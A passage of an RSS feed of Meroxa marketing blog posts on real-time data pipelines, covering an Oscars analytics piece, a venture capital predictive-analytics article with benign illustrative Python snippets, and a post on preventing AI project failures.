&lt;li&gt;&lt;strong&gt;Streams caption and translation data in real time.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Live event enhancement example:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/live-enhancements.png&quot; alt=&quot;live-enhancements.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Deepfake Detection for Authenticity&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;The Academy, in collaboration with AI companies, can use deepfake detection tools to verify the authenticity of media clips related to nominated films, preventing misinformation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Ingests and streams video content for real-time verification.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Connects deepfake detection AI models to media archives.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sends alerts for suspicious or manipulated content.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Example of deepfake detection with Meroxa:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/deepseek-detection.png&quot; alt=&quot;deepfake-detection.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;strong&gt;Oscars are a data-driven event&lt;/strong&gt;, and AI-powered analytics require &lt;strong&gt;real-time, reliable, and scalable&lt;/strong&gt; data pipelines. &lt;strong&gt;Meroxa’s Conduit Platform&lt;/strong&gt; helps data science and AI teams &lt;strong&gt;ingest, transform, and move&lt;/strong&gt; data efficiently across diverse systems—whether for predictive analytics, audience insights, voting security, or AI-powered marketing.&lt;/p&gt;
&lt;p&gt;With &lt;strong&gt;Meroxa&lt;/strong&gt;, data leaders can ensure that their pipelines &lt;strong&gt;perform seamlessly&lt;/strong&gt;, enabling better decision-making, improved security, and &lt;strong&gt;more engaging experiences for audiences worldwide&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Why AI and Data Will Shape the Future of Hollywood&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Looking ahead, AI could enable:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AI-assisted filmmaking recognition&lt;/strong&gt; where AI-generated films compete in their own category.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deeper bias analysis&lt;/strong&gt; to identify and address gender, racial, or genre biases in nominations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved real-time audience engagement&lt;/strong&gt; with hyper-personalized content delivery.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;🚀 &lt;strong&gt;Ready to revolutionize your data pipelines? Discover how Meroxa makes real-time data movement seamless.&lt;/strong&gt; &lt;a href=&quot;https://www.meroxa.com/&quot;&gt;Try Meroxa Today&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;🔗 &lt;strong&gt;Follow us on&lt;/strong&gt; &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for the latest updates on AI, data streaming, and real-time analytics.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Predictive Analytics in Venture Capital: A Technical Deep Dive for Tech Leaders]]></title><description><![CDATA[Explore how predictive analytics is transforming venture capital by leveraging machine learning, AI-driven data models, and real-time insights to optimize investment decisions. This technical deep dive covers data pipelines, risk assessment models, and portfolio optimization strategies, equipping tech leaders with the tools to enhance deal flow, mitigate risks, and maximize returns in the evolving VC landscape.]]></description><link>https://meroxa.com/blog/predictive-analytics-in-venture-capital-a-technical-deep-dive-for-tech-leaders</link><guid isPermaLink="false">https://meroxa.com/blog/predictive-analytics-in-venture-capital-a-technical-deep-dive-for-tech-leaders</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Wed, 26 Feb 2025 13:15:00 GMT</pubDate><content:encoded>&lt;h3&gt;Introduction&lt;/h3&gt;
&lt;p&gt;Venture capital is undergoing a seismic shift—one driven by data, AI, and real-time analytics. Traditional investment strategies, built on intuition and historical heuristics, no longer suffice in an era where speed and precision define success. The ability to harness predictive analytics not only enhances decision-making but also mitigates risk and accelerates due diligence.&lt;/p&gt;
&lt;p&gt;Tech leaders in VC must evolve, leveraging AI, machine learning (ML), and data streaming technologies to drive smarter investments. This article explores how predictive analytics transforms venture capital and how platforms like Meroxa empower firms to seamlessly integrate real-time data pipelines for a competitive edge.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Data Challenge in Venture Capital&lt;/h3&gt;
&lt;p&gt;Venture capital decision-making has long been constrained by fragmented, unstructured, and outdated data. The key challenges include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Overload:&lt;/strong&gt; Investors must process vast volumes of financial reports, founder backgrounds, market intelligence, and unstructured sentiment data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Risk Mitigation:&lt;/strong&gt; Identifying high-potential startups while filtering out high-risk ventures remains a complex task.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Time-Intensive Due Diligence:&lt;/strong&gt; Manual analysis of market signals and startup metrics delays decision-making, costing firms valuable opportunities.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/venture-capitalist-challenges.png&quot; alt=&quot;venture-capitalist-challenges.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Illustrates the data fragmentation issues and challenges in VC.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Predictive analytics alleviates these challenges by structuring and interpreting complex datasets in real time, leading to faster, more accurate investment decisions.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Predictive Analytics Pipeline in Venture Capital&lt;/h3&gt;
&lt;p&gt;A modern VC analytics pipeline integrates multiple data sources, applies machine learning models, and delivers actionable insights. Here’s how:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Real-Time Data Collection &amp;#x26; Processing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Data is the foundation of predictive analytics, and VC firms must aggregate structured and unstructured data from diverse sources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Structured Data:&lt;/strong&gt; Investment rounds, revenue metrics, market trends, SEC filings.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Unstructured Data:&lt;/strong&gt; Social media sentiment, press coverage, industry trends, founder digital footprints.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Feeds:&lt;/strong&gt; Funding announcements, stock fluctuations, patent filings, hiring trends.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/data-ingestion-vc.png&quot; alt=&quot;data-ingestion-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Demonstrates data sources and ingestion mechanisms.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; With Meroxa’s Conduit Platform, VC firms can automate data ingestion from APIs (e.g., Crunchbase, PitchBook, Bloomberg) and enrich datasets in real time, eliminating the bottlenecks of legacy ETL pipelines.&lt;/p&gt;
&lt;p&gt;🔹 &lt;em&gt;Key Technologies:&lt;/em&gt; Real-time data ingestion, event-driven architectures, Apache Kafka, Apache Flink.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Feature Engineering &amp;#x26; Data Modeling&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Raw data must be transformed into structured insights to train predictive models effectively. Feature engineering is crucial in determining:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Founder Signals:&lt;/strong&gt; Prior exits, domain expertise, network strength, investor relationships.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Market Traction:&lt;/strong&gt; User adoption, revenue growth, customer acquisition costs (CAC).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Competitive Landscape:&lt;/strong&gt; Market positioning, barriers to entry.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Macroeconomic Indicators:&lt;/strong&gt; Interest rates, regulatory risks.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/vc-raw-data-ingestion.png&quot; alt=&quot;vc-raw-data-ingestion.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Showcases the transformation of raw data into ML features.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; Meroxa automates feature extraction and transformation, allowing VC firms to enrich data pipelines dynamically without complex ETL dependencies.&lt;/p&gt;
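&lt;p&gt;The following Python sketch shows the shape of such a feature-engineering step: flattening a raw startup record into a numeric vector. The record fields and derived features are hypothetical examples, not part of Meroxa’s platform:&lt;/p&gt;

```python
# Illustrative only: turning a raw startup record into a numeric feature
# vector like the signals listed above. Field names are hypothetical.

def to_features(startup: dict) -> list:
    """Flatten a raw record into [prior exits, revenue growth, LTV/CAC ratio]."""
    founders = startup.get("founders", [])
    prior_exits = sum(f.get("exits", 0) for f in founders)
    rev = startup.get("revenue", [])
    growth = (rev[-1] / rev[0] - 1) if len(rev) >= 2 and rev[0] else 0.0
    cac_ratio = startup.get("ltv", 0) / max(startup.get("cac", 1), 1)
    return [prior_exits, round(growth, 2), round(cac_ratio, 2)]

raw = {
    "founders": [{"exits": 1}, {"exits": 2}],
    "revenue": [100_000, 250_000],   # trailing two periods
    "ltv": 900, "cac": 300,
}
print(to_features(raw))  # [3, 1.5, 3.0]
```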
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. Machine Learning Model Training &amp;#x26; Predictions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Once structured, data is fed into machine learning models to forecast startup success and optimize investment strategies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Classification Models:&lt;/strong&gt; Logistic regression, random forests, neural networks for success/failure predictions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regression Models:&lt;/strong&gt; XGBoost, linear regression to forecast valuation growth.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Clustering Algorithms:&lt;/strong&gt; K-means, hierarchical clustering to segment startups by risk-return profiles.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ml-learning.png&quot; alt=&quot;ml-learning.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Depicts different ML models and how they are trained.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; By seamlessly integrating with ML platforms like Google Vertex AI and AWS SageMaker, Meroxa enables continuous model training on real-time data.&lt;/p&gt;
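&lt;p&gt;For intuition, here is a minimal, dependency-free Python version of the classification idea above: a logistic-regression-style model trained by gradient descent on toy success/failure labels. In practice you would reach for a library such as scikit-learn or XGBoost; the data here is invented:&lt;/p&gt;

```python
# Illustrative only: a minimal logistic-regression classifier trained with
# gradient descent on toy success/failure labels. Real pipelines would use
# a library such as scikit-learn or XGBoost, as mentioned above.

import math

def train(X, y, lr=0.5, epochs=2000):
    """Fit weights (plus bias) by stochastic gradient descent on log loss."""
    w = [0.0] * (len(X[0]) + 1)           # last slot is the bias term
    for _ in range(epochs):
        for xi, yi in zip(X, y):
            z = sum(wj * xj for wj, xj in zip(w, xi)) + w[-1]
            p = 1 / (1 + math.exp(-z))    # predicted success probability
            for j in range(len(xi)):
                w[j] -= lr * (p - yi) * xi[j]
            w[-1] -= lr * (p - yi)
    return w

def predict(w, xi):
    z = sum(wj * xj for wj, xj in zip(w, xi)) + w[-1]
    return 1 if z > 0 else 0

# Features: [founder prior exits, revenue growth]; label: 1 = "success"
X = [[0, 0.1], [1, 0.2], [2, 1.5], [3, 2.0]]
y = [0, 0, 1, 1]
w = train(X, y)
print([predict(w, xi) for xi in X])  # [0, 0, 1, 1]
```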
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. Real-Time Risk Analysis &amp;#x26; Anomaly Detection&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Predictive analytics extends beyond forecasting; it proactively identifies emerging risks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sentiment Analysis:&lt;/strong&gt; NLP models scan Twitter, news, and LinkedIn for sentiment trends.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Anomaly Detection:&lt;/strong&gt; AI flags inconsistencies in financial statements and funding patterns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Alerts:&lt;/strong&gt; AI-driven alerts notify investors of negative news trends, regulatory risks, or executive departures.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/risk-analysis-vc.png&quot; alt=&quot;risk-analysis-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Highlights the process of monitoring risk signals in real time.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; Using event-driven architectures, Meroxa delivers real-time anomaly detection, ensuring VC firms act swiftly on emerging risks.&lt;/p&gt;
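&lt;p&gt;The anomaly-detection step can be as simple as a z-score test over a metric stream. The sketch below is a toy version in Python (real detectors are more robust, and the revenue figures are made up), but the shape of the check is the same:&lt;/p&gt;

```python
# Illustrative only: flagging anomalous values in a stream of metrics
# (e.g. weekly reported revenue) with a simple z-score test.

import statistics

def anomalies(values, threshold=3.0):
    """Indices of points more than `threshold` std devs from the mean."""
    mean = statistics.fmean(values)
    sd = statistics.pstdev(values)
    if sd == 0:
        return []
    return [i for i, v in enumerate(values) if abs(v - mean) / sd > threshold]

weekly_revenue = [100, 102, 98, 101, 99, 103, 500]  # last point is suspect
print(anomalies(weekly_revenue, threshold=2.0))  # [6]
```

&lt;p&gt;In an event-driven setup, each flagged index would instead trigger an alert downstream rather than being returned in a batch.&lt;/p&gt;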
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;5. Portfolio Optimization &amp;#x26; Dynamic Investment Strategy&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Predictive analytics extends beyond startup selection to portfolio management:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AI-Powered Capital Allocation:&lt;/strong&gt; Optimizes fund distribution across growth stages.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scenario Simulation:&lt;/strong&gt; Monte Carlo simulations test different economic conditions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Exit Strategy Forecasting:&lt;/strong&gt; Predicts optimal IPO, acquisition, or secondary market exit timing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/market-data-vc.png&quot; alt=&quot;market-data-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Illustrates AI-driven portfolio management strategies.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; By integrating reinforcement learning models, Meroxa ensures investment strategies dynamically evolve based on new market conditions.&lt;/p&gt;
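&lt;p&gt;To illustrate the scenario-simulation point, here is a tiny Monte Carlo sketch in Python that samples yearly returns per allocation bucket to estimate the expected portfolio multiple. The stage return parameters are invented for the example:&lt;/p&gt;

```python
# Illustrative only: a tiny Monte Carlo scenario simulation for a portfolio,
# sampling yearly returns per stage bucket. Parameters are hypothetical.

import random
import statistics

# (mean yearly return, volatility) per allocation bucket -- made up
STAGES = {"seed": (0.25, 0.60), "growth": (0.15, 0.30), "late": (0.08, 0.12)}

def simulate(allocation, years=5, trials=10_000, seed=42):
    """Return the mean final portfolio multiple over `trials` simulations."""
    rng = random.Random(seed)
    outcomes = []
    for _ in range(trials):
        value = 1.0
        for _ in range(years):
            growth = sum(
                weight * (1 + rng.gauss(mu, sigma))
                for stage, weight in allocation.items()
                for mu, sigma in [STAGES[stage]]
            )
            value *= max(growth, 0.0)  # the portfolio cannot go below zero
        outcomes.append(value)
    return statistics.fmean(outcomes)

allocation = {"seed": 0.3, "growth": 0.5, "late": 0.2}
print(round(simulate(allocation), 2))
```

&lt;p&gt;Varying the stage parameters per economic scenario (bull, base, downturn) and comparing the resulting distributions is what makes this useful for stress-testing allocations.&lt;/p&gt;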
&lt;hr&gt;
&lt;h3&gt;The Future of AI-Driven Venture Capital&lt;/h3&gt;
&lt;p&gt;As predictive analytics continues to evolve, we anticipate:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Explainable AI (XAI):&lt;/strong&gt; Reducing the black-box nature of VC funding models.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Blockchain &amp;#x26; Smart Contracts:&lt;/strong&gt; Automating equity tracking and funding disbursement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Quantum Computing:&lt;/strong&gt; Unlocking ultra-complex investment simulations for multi-factor startup evaluations.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;VC firms must move beyond intuition-based decision-making and embrace AI-powered precision. Predictive analytics, when integrated with real-time data pipelines, unlocks unprecedented speed and accuracy in investment decisions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa is the missing link for tech-driven VC firms, providing the infrastructure to build real-time, AI-powered investment intelligence.&lt;/strong&gt; Check out a &lt;a href=&quot;https://www.meroxa.com/demo&quot;&gt;demo&lt;/a&gt; with one of our experts today! Also, follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How Meroxa Helps Tech Leaders Prevent AI Project Failures and Maximize Success]]></title><description><![CDATA[AI projects often fail due to data bottlenecks, infrastructure complexity, and governance challenges. This blog explores how Meroxa helps tech leaders overcome these issues with real-time data movement, automation, and security, ensuring scalable, high-performance AI deployments. ]]></description><link>https://meroxa.com/blog/how-meroxa-helps-tech-leaders-prevent-ai-project-failures-and-maximize-success</link><guid isPermaLink="false">https://meroxa.com/blog/how-meroxa-helps-tech-leaders-prevent-ai-project-failures-and-maximize-success</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Thu, 20 Feb 2025 13:15:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;80% of AI projects fail&lt;/strong&gt;—don’t let yours be one of them. AI initiatives often struggle due to poor data quality, ineffective integration, and slow operationalization. Tech leaders need real-time, reliable data to ensure AI success.&lt;/p&gt;
&lt;p&gt;Meroxa provides the infrastructure to fix broken AI workflows—enabling real-time, automated, and scalable data movement.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;The Data Challenges That Lead to AI Failures&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;A recent RAND Corporation report revealed a startling reality: &lt;strong&gt;80% of AI projects fail&lt;/strong&gt;, leading to significant financial losses and wasted resources. For CTOs, CIOs, CDOs, and other tech leaders, this failure rate poses critical questions about how to design, implement, and scale AI initiatives successfully. The challenges often stem from poor data quality, ineffective integration strategies, and the inability to operationalize AI models efficiently.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ai-failure-points.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Illustration of the major failure points in AI projects, from data quality issues to deployment challenges.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;At Meroxa, we believe that &lt;strong&gt;real-time data movement and infrastructure automation&lt;/strong&gt; are key to overcoming these challenges. Unlike traditional data integration solutions that struggle with latency, complexity, and inefficiency, Meroxa offers a streamlined approach with automated, real-time streaming capabilities. Our Conduit Platform not only ensures high-speed data availability but also simplifies deployment, reducing time-to-value for AI initiatives. Here’s how Meroxa can support your AI initiatives and drive successful outcomes.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Ensuring High-Quality, Real-Time Data for AI Models&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Many AI projects fail because they rely on outdated, incomplete, or low-quality data. &lt;strong&gt;AI is only as good as the data it learns from&lt;/strong&gt;—and without real-time, enriched, and clean data, even the most sophisticated models will underperform.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ai-failure-start.png&quot; alt=&quot;ai-failure-start.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Visualization of Meroxa’s real-time data streaming pipeline and how it integrates into AI workflows.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Streaming&lt;/strong&gt;: With Meroxa’s &lt;strong&gt;Conduit Platform&lt;/strong&gt;, organizations can stream real-time data from multiple sources (databases, event streams, APIs) directly into AI pipelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Quality &amp;#x26; Transformation&lt;/strong&gt;: Automate &lt;strong&gt;data enrichment, cleansing, and normalization&lt;/strong&gt; before feeding data into AI models, ensuring accuracy and consistency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;: Handle high-velocity and high-volume data without performance bottlenecks, ensuring AI models receive timely insights.&lt;/li&gt;
&lt;/ul&gt;
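&lt;p&gt;As a concrete (and deliberately simplified) picture of the cleansing and normalization step described above, here is a per-record transform in Python; the field names and rules are hypothetical, not a Meroxa API:&lt;/p&gt;

```python
# Illustrative only: the kind of cleansing/normalization step described
# above, applied per record before data reaches a model.

def clean(record: dict):
    """Drop unusable records; normalize the rest to a consistent shape."""
    if not record.get("user_id"):
        return None                          # incomplete record -> reject
    amount = record.get("amount")
    if isinstance(amount, str):
        amount = amount.replace("$", "").replace(",", "")
    try:
        amount = float(amount)
    except (TypeError, ValueError):
        return None                          # unparseable amount -> reject
    return {"user_id": str(record["user_id"]).strip(),
            "amount": round(amount, 2),
            "currency": record.get("currency", "USD").upper()}

raw = [{"user_id": " 42 ", "amount": "$1,234.50", "currency": "usd"},
       {"user_id": None, "amount": 10}]
print([clean(r) for r in raw])
```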
&lt;h3&gt;&lt;strong&gt;Seamless Integration of AI Workflows with Data Infrastructure&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Many enterprises struggle with siloed data and disconnected workflows, making it difficult to integrate AI models with operational systems.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ai-enterprise-applications.png&quot; alt=&quot;ai-enterprise-applications.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: How Meroxa seamlessly integrates AI models with enterprise applications.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Connect AI to Enterprise Systems&lt;/strong&gt;: Seamlessly integrate AI models with business applications (CRM, ERP, analytics dashboards) to enable real-time decision-making.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Data Pipelines&lt;/strong&gt;: Instead of manually stitching together complex data workflows, Meroxa automates AI data integration, reducing development time and human errors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Support for AI/ML Tooling&lt;/strong&gt;: Whether using &lt;strong&gt;Databricks, Snowflake, AWS SageMaker, or custom AI models&lt;/strong&gt;, Meroxa simplifies the movement of data to and from these environments.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Reducing Time-to-Value for AI Initiatives&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;70% of AI models never make it past the experimental phase because deployment takes too long. &lt;strong&gt;By the time an AI model is deployed, the data landscape may have changed, reducing its relevance and effectiveness.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/accelerates-ai-deployment.png&quot; alt=&quot;accelerates-ai-deployment.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: How real-time data movement accelerates AI deployment.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Faster AI Model Deployment&lt;/strong&gt;: Automate real-time data ingestion into AI training and inference workflows, shortening the feedback loop between data collection and model refinement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitoring &amp;#x26; Observability&lt;/strong&gt;: Get &lt;strong&gt;end-to-end visibility&lt;/strong&gt; into data movement, transformations, and AI performance metrics to quickly identify and address issues.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event-Driven Architectures&lt;/strong&gt;: Power AI-driven automation by streaming real-time events directly into decision engines and AI models.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Cost Optimization &amp;#x26; Infrastructure Efficiency&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;AI failures often translate to &lt;strong&gt;wasted infrastructure spend&lt;/strong&gt;, with research showing that up to 40% of AI project costs stem from inefficiencies in data movement and infrastructure management.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ai-cost.png&quot; alt=&quot;ai-cost.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Cost breakdown of AI projects and how Meroxa optimizes expenses.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Cost-Effective Data Movement&lt;/strong&gt;: Optimize infrastructure spend with &lt;strong&gt;event-driven and real-time data pipelines&lt;/strong&gt;, reducing storage and processing overhead.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Eliminate Data Duplication &amp;#x26; Latency&lt;/strong&gt;: Avoid unnecessary data replication and ensure that only the most &lt;strong&gt;relevant, high-quality&lt;/strong&gt; data feeds into AI systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexible Cloud &amp;#x26; Hybrid Deployments&lt;/strong&gt;: Run AI workloads efficiently across &lt;strong&gt;cloud, on-premise, or hybrid environments&lt;/strong&gt; without additional complexity.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;AI Governance, Compliance &amp;#x26; Security&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With increased scrutiny on AI ethics, bias, and regulatory compliance, organizations must ensure &lt;strong&gt;governance and transparency&lt;/strong&gt; in their AI pipelines.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/security.png&quot; alt=&quot;security.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Overview of Meroxa’s AI governance and compliance framework.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Lineage &amp;#x26; Auditing&lt;/strong&gt;: Track data movement and transformations to &lt;strong&gt;maintain compliance with AI governance policies&lt;/strong&gt;, such as GDPR and CCPA, by ensuring auditability and data traceability.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Security &amp;#x26; Access Controls&lt;/strong&gt;: Ensure that only authorized systems and users can access AI datasets, reducing security risks and meeting industry compliance requirements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AI Explainability Support&lt;/strong&gt;: Streamline access to real-time metadata and historical data for AI model audits and explainability requirements, ensuring compliance with ethical AI frameworks like the EU AI Act.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion: Set Your AI Projects Up for Success with Meroxa&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The reality of AI project failures is daunting, but it is not inevitable. &lt;strong&gt;With the right data infrastructure, automation, and real-time capabilities, organizations can dramatically improve their AI success rates.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For example, a leading financial services company leveraged Meroxa’s real-time data streaming to enhance fraud detection. By integrating real-time transactional data with AI-driven risk models, they reduced fraud detection time from hours to seconds, preventing up to 85% of fraudulent transactions and saving millions in potential losses.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to reduce AI failure rates and accelerate innovation?&lt;/strong&gt; Don’t let poor data infrastructure hold your AI projects back. Take action today. Let’s talk.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;&lt;strong&gt;Contact us now&lt;/strong&gt;&lt;/a&gt; to see how Meroxa can transform your AI data strategy. Schedule a demo and start optimizing your AI workflows today!
